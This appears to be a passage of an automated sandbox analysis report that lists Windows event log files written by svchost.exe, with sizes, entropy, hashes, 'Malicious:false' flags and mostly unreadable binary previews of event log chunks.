                                                Preview:ElfChnk.........]...............]...............0...........................................................................>...............................................=...................................................................................%.......................................X...............?...............................................M...F.......................................................................................>...........................................z...............**..............................g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.625347651139654
                                                Encrypted:false
                                                SSDEEP:1536:+XY5nVYIyyqED5BVZUevOBtNPhPVwCRPvf:+XY5nVYIyyqED5BVZUevOBtNPhPVwChf
                                                MD5:890CA9963C766DA05E491710E1CD9D7F
                                                SHA1:3F95AB4363D5DB533E60748F69A364196BAC8920
                                                SHA-256:47523E0AC40BC366CD0A86BE9A72ECEF3A72EE7D430B25A61D8DF55341C19531
                                                SHA-512:C2D739AE5ABF76C627DA8B863CC73FF31F7C7733138DB2954A3102377FD0270F69FE269EEAE0DE4172E53E194C3B71791CD09B36F880DC726665004FD9C6A07F
                                                Malicious:false
                                                Preview:ElfChnk.........................................`....:..........................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......v.......................................................y.......................**................9..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:modified
                                                Size (bytes):91352
                                                Entropy (8bit):2.4880174975789817
                                                Encrypted:false
                                                SSDEEP:384:Qhdo69CcoTorNorWorbvorTorZorQorNor7orqorlGhorBort6ohorRorsor1orG:QDCRuZDCRuk+Y
                                                MD5:9E5479C45CC6713E78AA824BD194C7C5
                                                SHA1:ED69C694D0B3A9183ACAE76E5AE0E22EEA9CFB92
                                                SHA-256:4F3641CE42682B4F0D64154CFB92CD14D67C278F92B815BC4BDDD986071219DD
                                                SHA-512:FE6D2CCEE270527A5A125D2CE2504AF4A0E7829AD4800BF43D9CD23B49F313F67EE7EEA45457CDA7D85AEDADFD426D92061D5BFE3FEB04E81DDDA8219EF71D09
                                                Malicious:false
                                                Preview:ElfChnk.....................................hJ...L..@.."........................................................................................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................3..................................E/..............])..............................**...............k...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:DIY-Thermocam raw data (Lepton 2.x), scale 8448-1024, spot sensor temperature 0.000000, unit celsius, color scheme 1, calibration: offset 0.000000, slope 207715216474546355539665747968.000000
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.8526226240352849
                                                Encrypted:false
                                                SSDEEP:384:YhAiPA5PNPxPEPHPhPEPmPSPRP3PoPqP7DPfPqP/P:Y2NP
                                                MD5:585F5E645713292DF375B49B2BDC28EA
                                                SHA1:42531DC7FEDA50E16705A1260EC70B5AD7015FCB
                                                SHA-256:E16C3A02C9E22074AE98621BB170E12D41A54187FCC6D53B5600F5712F37A9FF
                                                SHA-512:0C0008188EC621D5FE00CF9211729347A941AF2DE55DA3333114D83B4D181FB8792C64FA0F62309660F51FF26349684D35EAC0A4E0FE98898D1C03CAAB65B434
                                                Malicious:false
                                                Preview:ElfChnk......................................%...&...A..................................................................... p..................N...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................................................................................'.......................**..x.............|..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.8442469423268683
                                                Encrypted:false
                                                SSDEEP:384:DhZ21JJgL4JJFiJJ+aeJJ+WBJJ+5vJJ+/UJJ+4fJJ+CwJJ+D2JJ+a2JJ+JtJJ+lk:DWXSYieD+tvgzmMvB2R387
                                                MD5:A12D2A18D158FA0E4EBA801B76795EAC
                                                SHA1:22C6C36D8E0ACD32735F5C0D25929CD734A2DB9F
                                                SHA-256:4A2A9FFE44AB14DE2504B3632FBDDC8EC4E3B35AFF6C5CCA75AB5095E164E39E
                                                SHA-512:729117B98F2FA8D18DD3A9B0A373EA5CD36A9B88BA54A45579DE0C50C68DABAB50096CC3078DDA1C11A7483D95CD6B39A54AF35282B1C2550F0AAE4A80F8BEA9
                                                Malicious:false
                                                Preview:ElfChnk......................................$...&.....i....................................................................x..(................F...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................&...............................................................................**..p............zu..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):3.195274240374291
                                                Encrypted:false
                                                SSDEEP:384:ZhqhSx4h/y4Rhph5h6hNh5hah/hrhbhmhjh/h7hkh8hbhMh9hYwhChwh8hRqh28j:ZbCyhLfI931N
                                                MD5:6728E529686A29F3C0CB24FCDAC7DE54
                                                SHA1:36F33D1B8206E3059A469A4D77DFF975B5110843
                                                SHA-256:7DEDB2248E911D89A2ABF1430005FAC9B55684A30DECC312B9CCE0F898CCDA5F
                                                SHA-512:913B017504A85CDA5406E1B30BFE6A6F767A73597F6790466248DE99E70191617E9EF8D0457CB2CCBEBB2DF71785C6C750F94BDCE254FB34B67A73E6CB6DCD81
                                                Malicious:false
                                                Preview:ElfChnk.........N...............N...................Mo-.........................................................................................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................n.......6t..............................................................................**..`............0H..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):3.3895763915665986
                                                Encrypted:false
                                                SSDEEP:768:TcMhFBuyKskZljdoKXjtT/r18rQXn8uwgSj70FTP:gMhFBuV80
                                                MD5:1D8BE61A76EB65AD20811E2A3EBD8D8B
                                                SHA1:65BCCD165D3CF1461160CB66C599C27292F5CFAE
                                                SHA-256:3A422D3D5B358379363C1C04D81DDC636AB1EE1E1B9ACC78C43CF02BDCD438CD
                                                SHA-512:2150FFB459D6F9B9AC6DE5274E96C59803240F3C6CFD820C565B892B10FD7DF152B223D05A01433A15DB737C688D4451DD78B07BB42F9774C18CC64E48D23FC4
                                                Malicious:false
                                                Preview:ElfChnk.........O...............O...........0........~......................................................................O.".................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............m...........................5A..........................................**..x...........,.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.900849391492108
                                                Encrypted:false
                                                SSDEEP:768:wtvigANk0vAzBCBao/F6Cf2SEqEhwaK41HZalMIq9Iz6IOTLGfFXN/E:KDH+dqWzrhFXN/E
                                                MD5:C5C67E971469A08768EEAA50D6CDFA80
                                                SHA1:BE7F82BB386B57D8133754BF50EC601B5F03B359
                                                SHA-256:5FCC096B23E96EEAF2E15980158ED235A11EC2D0EF3DE416CA22BBD108D20B71
                                                SHA-512:D72044FA5A8CA1D3DF8C7F1EE7D1ABAEB0DFFB1A4A6C644176088AF387E611D7A88467F7C338895D1467324B977DC39A5870A9269E6F66AB22F7662CB17FF2E5
                                                Malicious:false
                                                Preview:ElfChnk.w...............w............................`........................................................................?.................4.......................\...=...........................................................................................................................f...............?...........................m...................M...F...................................................................&...............................................................................**..H...w...........`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 27, DIRTY
                                                Category:dropped
                                                Size (bytes):93416
                                                Entropy (8bit):2.772166390025152
                                                Encrypted:false
                                                SSDEEP:384:2Oh1kbAP1gzkw3kN5Ayqk+HkzGk+hkV3SuckzlckA66k+4DkzRxk+dkzwUk+rkzc:5MAP1Qa5AgfQQhCdMAP1Qa5AgfQQhC
                                                MD5:55802A9A8269B88E9ED14075334BD345
                                                SHA1:99D04229177792BA4E1ADFB6BF146718B0692B40
                                                SHA-256:9E83D44A9EE02BC1C778743D73CB022F3C7354ED3A4AF0C795F98047134C5CDF
                                                SHA-512:ECF26715F0FF8A0A597A376BA4AD4385B3910D1E4647101B7451CCFCB9B13814292117513BFB03667654B8041C29D49063FF2B1EDAD7627D2CE015BD5714FBAE
                                                Malicious:false
                                                Preview:ElfFile.....................................................................................................................|.~2ElfChnk.....................................hi..hl..N=.,.....................................................................P.B................b...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........Y...............................&..............;...............................**..x...........HD................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.441475404183629
                                                Encrypted:false
                                                SSDEEP:768:ZbM5eahvB94LSAoiMTQMrj+/IVvu4mJY0YCOO:dMAaZBLzn6fYZO
                                                MD5:B7F318BB9FA336235CCBE5A391775D8E
                                                SHA1:F7F7CFF57A6BB00B4E6F17E39BAAF2443E08878D
                                                SHA-256:D59515423F15D3618746447E1333945BF1432B9B4C20B54849050CE17C72311D
                                                SHA-512:1C8FA8FD31BC4A3C6815A473C00187497E7E71CAF1FAD61F5A6D73DBEB6AE9D551A3DAA6B39B76A4D1401A061844036D5D06469A3942BC030B276D4E186C7289
                                                Malicious:false
                                                Preview:ElfChnk.r...............r...................0.......A..@....................................................................k...................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F....................+...............)......55......................&.......E....@......M#..............u7.......1.........../...........!..]>......**......r.......R...`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:DIY-Thermocam raw data (Lepton 3.x), scale 8448-4108, spot sensor temperature 0.000000, unit celsius, color scheme 1, show spot sensor, calibration: offset 0.000000, slope 308596736.000000
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):3.4699263306571524
                                                Encrypted:false
                                                SSDEEP:384:6hYCAKRuKIYKxkKiCKVIAK8sL4K5VKjPKwnKZ/K50K8/0KXAKuWKSlK+NK8t3Klq:61T4hu7OJscMmza
                                                MD5:86173450A7EE15BC5B6A2C667DD3B040
                                                SHA1:200635B7FB3137AB9A33A6551182F4BA05BDCE84
                                                SHA-256:AEDE5AAE515D2A3C78BA23C631D178DCCB3E775CD3B4FB6F0406887FAEDE5B88
                                                SHA-512:3A73438F1A7B3B2F166B2B2F70E713F7393A2F2D5DF23858D05F2790BD2DF5B2CDC38263EC72ECC34621C82C44308E3C0474E295C678642E30146CAC27D69067
                                                Malicious:false
                                                Preview:ElfChnk.........s...............s..............x....,........................................................................5.................V.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.............................................................../.......................**............... .$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):2.450965793914843
                                                Encrypted:false
                                                SSDEEP:384:phFiDhKxDmqIDrfDYEDdDDDbDOD2DSD+DtDFDxDlDUDEDoDADeDuDx4DWDXDjDfO:pzSKEqsMuy6CL3
                                                MD5:3914FD52494E203A25B69F9F4221031F
                                                SHA1:8046E0D1C78A47632A4550AC66FC9917E6429457
                                                SHA-256:D2D37391EC1325C6C27486311C5B5E1D11C55D0A464270F009E3D3E1B2A54D3B
                                                SHA-512:12FB89D2F9A5B19C7150D23A09A7C7B3F5616C09C8A83AE83A331263F0FA45181066F1A44080A46FE3A9F551BDF56485BD03DB9001FE82388DCDB1EF3FBC7829
                                                Malicious:false
                                                Preview:ElfChnk.........L...............L...................=....................................................................... ..H................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................&........................................`..............................................................................**...............v?..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):2.1568075545974956
                                                Encrypted:false
                                                SSDEEP:384:ZhMLzI9ozTxzFEz3zLzWztCzizQzzz5zqfzDz5z1zkzSz9zEzWz+zQzqbzUTz3zg:Zmw9g3LCjg
                                                MD5:F3CF496665845DA6C957242770973ECE
                                                SHA1:BF7206ECD6C6ABE687BE10A157C86C7EBE59C6BD
                                                SHA-256:BB190FF3FA391F3B69F3E4509B14D6DE320C980D69A59BC74DBD57BD8AA42F7F
                                                SHA-512:EA5A2D21353556B5B6FC420671E5F7026B6A280C7CD740CD1CAFA2C958318B5BB6A5F4AE6A00450E2A7997425A0AAAFFD158452401ABB732CA985A8DE3548213
                                                Malicious:false
                                                Preview:ElfChnk.........6...............6...........(o...p..........................................................................y.................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......E.......................n........X..............................................................................**..............j...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):1.8853799397148268
                                                Encrypted:false
                                                SSDEEP:384:5hCI2LwuSsYI8tIbLIYoI/IE6IQsIhIxIUIfIXIAI2I/IRIvI:5Z
                                                MD5:FACBCFA717058EFCED1754221D6A421D
                                                SHA1:1BA10B3E2BB8A2C739257CE228789E2D6C4F1A1D
                                                SHA-256:6F6A7779828D79A41F94AF9EE452BB44EE0E495D27A5B5DE7DAD659A6865C9CB
                                                SHA-512:0253FDCC88D3E52A9A26A065AC0C4E264DC0E84CB6A175D09BEC79E56D5282B9B95DCE2FEF47C48505D34C629388904AA6E2BDFF81759920FE314D6F9F5A6DB0
                                                Malicious:false
                                                Preview:ElfChnk.K.......L.......K.......L...............@6..u..B.....................................................................w..................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F...................................................................&...............................................................................**......K.......1E..`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):1.0596696487276978
                                                Encrypted:false
                                                SSDEEP:384:Qh1hM7MpMEaMWFMu/Ma2M+AMmGM1cMNF3Mg9Ml7MABMczM0cMKhMpHMXmM+ZM6Zz:QeJ+
                                                MD5:F6D375E51341AC949A73803CF00B96E6
                                                SHA1:5DB3BF9A34145DD777EA9593DE3C8054B08A11D1
                                                SHA-256:EBDFA834049A08F8FC9B3DD35800233E75BDB480D59E548D7F4F3F2720B889F9
                                                SHA-512:1714A4243ECEB63E23583F31D3D6C161D8423E1AD2D1E1440545718E6DA879F74C2F03E5C21120ED826093777F6DEEEFEC57B913E1B4C1D74C0B8A473752460B
                                                Malicious:false
                                                Preview:ElfChnk.........................................X0.....!....................................................................B...........................................>...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................6(..............................................................................**..............c...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.241268628600426
                                                Encrypted:false
                                                SSDEEP:384:Thk1EL1I1Vh1C1D161f1f181L1tY1VGm1Q1L1p1VG1U1Z1s1VA141c1Vc1q1tS1/:TBjdjP0csQqL
                                                MD5:602FD635C1BE2C0F087784BAE052554B
                                                SHA1:77EE62511C78BA6989DF77AC6B616422A44D7F54
                                                SHA-256:78FC5D1D71915650A8080B217B8B28F799B054F35C89AAB2C474DC4B9C3F0581
                                                SHA-512:8A66621CE4233D42AE83A0046A04628F4A88D91713C064944A61AFDF3F33D44E54E416A8441D1FFFDDCEA2E909761BBF151894881B4F93C0D238537939E21217
                                                Malicious:false
                                                Preview:ElfChnk...............................................j.........................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&..............................A.......................................................**..............*5.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):70440
                                                Entropy (8bit):3.548884984798217
                                                Encrypted:false
                                                SSDEEP:384:DdIoLI0IWTI+I4ILINI4IuqIdWhDIEQAGxIHIFIWiIfeIT4IEIIInIhvohIG6If7:DR3WZxGkilAG
                                                MD5:E5F772BFFEE5889EA16CC35757457983
                                                SHA1:820EF1CD63E0B5C993EF96D479770F3B3BA4D6D7
                                                SHA-256:C754EBA131761AA89605F3E3AE3B68CCCB5B5AE18BC18E6763EA0FA3013F3607
                                                SHA-512:5A9E27389715666E87835AE4823B939A3D1ECEFA06D84EDA4E5EA6504533888F3AD9FDF2FC6559A940995D5CF00724822F903497572FDD5F57B9558ADB473B28
                                                Malicious:false
                                                Preview:ElfChnk.T...............T...................h... ....Z#:................................................................................................................>...=...........................................................................................................................f...............?...........................m...................M...F...........................................................a........F..........1........................................)..........................**..............v..geM..........E!.F..............................................................,.......D...x.!........... ....@v..geM.....`....Z..`.......P........................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.N.t.f.s..z.?..nM.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.N.t.f.s./.O.p.e.r.a.t.i.o.n.a.l.......a.............................................K...YM...?........C.:.........................explorer.exe...................**..............~..geM..........E!.F............
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.8023807109333921
                                                Encrypted:false
                                                SSDEEP:384:Fch6iIvcImIvITIQIoIoI3IEIMIoIBIOIRTIWeIZIEPdINI:FcoxXxP
                                                MD5:996D00E5A8B66706691FE697CCD68A7A
                                                SHA1:C90C99232451BAF2DCEB02C56C69CA9194390A9D
                                                SHA-256:95EF5245BEB2BBFD8EB8F5CE3A0C81869EF2AFACA54EF3445C3B144909C6A4B2
                                                SHA-512:FEA1D551151A622B151133814ECA8DE8EE4E3DA6D08F81CCE931FA7A64242E732A283E03A4B21EE922AF24F6FF0AF5EE2F26CDB7AA534583063C40F9C40DA0C8
                                                Malicious:false
                                                Preview:ElfChnk.....................................`"...#...l]....................................................................upp.............................................=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................^...............................................................................**..............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):2.999253421723821
                                                Encrypted:false
                                                SSDEEP:768:h4u1n8zfFFU1x4Dk13xIb13xIb13xIt13xIi13xI513xIU13xI013xIF13xIH130:j
                                                MD5:11CAFE60067FAE9C5A304C7A7DAC0EB5
                                                SHA1:0E72987588CB8557C7CD00AD3D8956CDC0593C35
                                                SHA-256:1AFA765FD9A0D9659C2A02A266ED4FD303C82BD9AFF45F0E7167E335F91E042E
                                                SHA-512:764A5D459803B989800473821647907FF484C914778A8AE42257E4791C1C1369E5490AB9365665C257045A007907981E78C1F2B4D5652BCA777873439537E9D0
                                                Malicious:false
                                                Preview:ElfChnk.....................................0...@......~....................................................................u!..................(.......................P...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................ ......................................................................................**...............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:dBase III DBT, next free block index 1130785861, 1st item "**"
                                                Category:dropped
                                                Size (bytes):4784
                                                Entropy (8bit):3.9590412646130924
                                                Encrypted:false
                                                SSDEEP:96:ySNVaO8Mco1RywtayaByGIyeyhYshqyQX8ZQyq:ykV7JRywtayaByGIyeyhYskyQ8ZQyq
                                                MD5:EDD32D29F33E09CB0638E5049F50AEB8
                                                SHA1:D0EB0DEAF115C01DF456196D06DB10ADECDA661F
                                                SHA-256:9D500F621F8E0B5714FA3E0904BF403A591D5C74ED5CCA5B705BD33CC76C9C58
                                                SHA-512:98619DE0AF992F0DB57D9BBF6C40C5AE8F9247C4EB0218D2F12557FAC81708A4BF25478CC160F2B5BEE1901B5D070A1E92393F65957B14D29B914C4FFAB590B1
                                                Malicious:false
                                                Preview:ElfChnk.................P.......R....................<......................................................................o..]................8...........................=...........................................................................................................................f...............?...........................m...................M...F...................................................................&...............................................................................**..h...P.........=.ZM..........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.435761335270744
                                                Encrypted:false
                                                SSDEEP:768:jpUOZc1jN2RkG6OQFAWAbYgO0TKLCjDjv5nTPC9:lZcy4AVKLCjDxTPw
                                                MD5:5326FF581E9596C4674ADCBEECAE50AA
                                                SHA1:96D2F4A031204AF8C378262CD458AEA904E6ED28
